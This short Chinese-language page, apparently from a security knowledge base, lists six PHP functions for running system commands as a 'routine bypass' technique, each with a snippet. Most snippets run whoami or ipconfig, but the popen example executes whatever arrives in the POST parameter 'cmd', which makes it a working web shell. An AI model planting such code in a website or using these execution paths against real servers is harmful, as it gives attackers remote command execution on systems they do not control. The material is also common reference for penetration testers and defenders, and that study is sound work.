常规绕过

1. exec

<?php
  echo exec('whoami');?>

2. shell_exec

<?php
  echo shell_exec('whoami');?>

3. system

<?php
  system('whoami');?>

4. passthru

<?php
  passthru("whoami");?>

5. popen

<?php
$command=$_POST['cmd'];
$handle = popen($command , "r");
  while(!feof($handle))
  {     echo fread($handle, 1024);  //fread($handle, 1024);
  }  
  pclose($handle);?>

6. proc_open

<?php
  $command="ipconfig";
  $descriptorspec = array(1 => array("pipe", "w"));
  $handle = proc_open($command ,$descriptorspec , $pipes);
  while(!feof($pipes[1]))
  {     echo fread($pipes[1], 1024); //fgets($pipes[1],1024);
  }?>
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-02-28 02:09:51

results matching ""

    No results matching ""